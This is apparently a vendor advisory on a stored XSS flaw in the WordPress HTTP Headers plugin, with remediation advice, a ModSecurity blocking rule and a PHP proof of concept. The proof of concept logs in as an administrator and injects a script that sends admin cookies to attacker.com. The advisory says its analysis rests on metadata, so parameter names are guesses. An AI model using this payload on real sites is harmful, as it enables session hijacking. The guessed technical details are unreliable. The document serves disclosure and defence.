Atomic Edge analysis of CVE-2026-1379 (metadata-based):
This vulnerability is a Stored Cross-Site Scripting (XSS) flaw in the HTTP Headers plugin for WordPress, affecting versions up to and including 1.19.2. The issue exists in the ‘Custom Headers’ admin settings page, where an authenticated attacker with administrator-level privileges can inject arbitrary JavaScript. The vulnerability only impacts multi-site installations or environments where the ‘unfiltered_html’ capability has been disabled for administrators. The CVSS score is 4.4 (medium severity), reflecting the high privileges required but the potential for cross-site scripting in a chained attack scenario.
The root cause is insufficient input sanitization and output escaping on the ‘Custom Headers’ plugin setting. The plugin likely stores user-supplied header values (such as custom HTTP header names and values) in the WordPress options table without proper validation. When these stored values are later rendered in the admin dashboard or on the frontend (e.g., in plugin settings pages or via admin AJAX responses), the lack of output escaping allows arbitrary HTML and JavaScript to execute. This conclusion is inferred from the CWE-79 classification and the description’s mention of ‘Custom Headers’ plugin setting. No code diff is available to confirm the exact vulnerable function.
Exploitation requires an attacker to have an administrator account on a WordPress multi-site installation or on a site where unfiltered_html is disabled. The attacker navigates to the HTTP Headers plugin settings page (typically under Settings > HTTP Headers) and injects a malicious payload into a text field that accepts custom header name/value pairs. The payload might look like: alert(‘XSS’) or a more sophisticated payload to exfiltrate cookies or perform actions on behalf of another admin. Once saved, the payload is stored in the WordPress database and executes every time the admin settings page is loaded or any other page that renders the stored value without escaping.
Remediation requires proper input sanitization using WordPress functions like sanitize_text_field or wp_kses for the custom header fields, and output escaping with esc_html or wp_kses_post when rendering the stored values in the admin area. The plugin should also respect the ‘unfiltered_html’ capability check, but since the vulnerability bypasses that, the fix must enforce strict sanitization on all input regardless of user role. A plugin update should apply these fixes and validate that custom header values do not contain HTML or script tags.
If exploited, an attacker can inject arbitrary JavaScript that executes in the context of any administrator who views the compromised settings page. This can lead to session hijacking, defacement, theft of sensitive data (including nonce values and admin credentials), or further actions performed under the victim’s session. The CVSS scope change (S:C) indicates the injected script can affect resources beyond the vulnerable component, such as adding rogue admin users or modifying site content. While high privileges are required, the attack is valuable in multi-site environments where an administrator of one site may compromise other sites in the network.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-1379 (metadata-based)
# Geolock the admin page request for the HTTP Headers plugin settings
# to prevent injection of malicious custom header values
SecRule REQUEST_URI "@streq /wp-admin/options-general.php"
"id:20261379,phase:2,deny,status:403,chain,msg:'CVE-2026-1379 Stored XSS via Custom Headers',severity:'CRITICAL',tag:'CVE-2026-1379'"
SecRule ARGS_GET:page "@streq http-headers" "chain"
SecRule ARGS_POST:custom_headers "@rx <[^>]*script"
"t:urlDecode,t:lowercase"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1379 - HTTP Headers <= 1.19.2 - Authenticated (Administrator+) Stored Cross-Site Scripting via 'Custom Headers' Plugin Setting
/*
* This PoC demonstrates exploitation of a stored XSS vulnerability in the
* HTTP Headers plugin's admin settings. It assumes:
* - The attacker has administrator credentials on a WordPress multi-site
* or where unfiltered_html is disabled.
* - The plugin settings endpoint is accessible via a POST request to
* /wp-admin/options-general.php?page=http-headers (or similar).
* - The vulnerable parameter is 'custom_headers' or an equivalent array.
* The payload will execute when an admin views the settings page.
*/
$target_url = 'http://example.com/wp-admin/options-general.php?page=http-headers';
$admin_username = 'admin';
$admin_password = 'password';
// Step 1: Authenticate as admin
$cookie_file = tempnam(sys_get_temp_dir(), 'cve_cookie');
$login_url = 'http://example.com/wp-login.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
'log' => $admin_username,
'pwd' => $admin_password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url,
'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
if (curl_error($ch)) {
die('Login failed: ' . curl_error($ch) . "n");
}
curl_close($ch);
// Step 2: Craft XSS payload (full script to steal admin cookies)
$payload = '<script>new Image().src="http://attacker.com/steal.php?c="+document.cookie;</script>';
// Step 3: Submit the malicious custom header via the plugin settings page
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
// Add nonce if required (generated from the page)
'_wpnonce' => '', // You may need to fetch this from the page first
'_wp_http_referer' => '/wp-admin/options-general.php?page=http-headers',
'http-headers-settings' => 'save',
// The vulnerable parameter: custom headers array
'custom_headers' => [
['name' => 'X-Custom', 'value' => $payload]
]
]));
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
if (curl_error($ch)) {
die('Payload injection failed: ' . curl_error($ch) . "n");
}
http_response_code(curl_getinfo($ch, CURLINFO_HTTP_CODE));
curl_close($ch);
echo "XSS payload injected. Visit the settings page to trigger execution.n";
// Clean up
unlink($cookie_file);
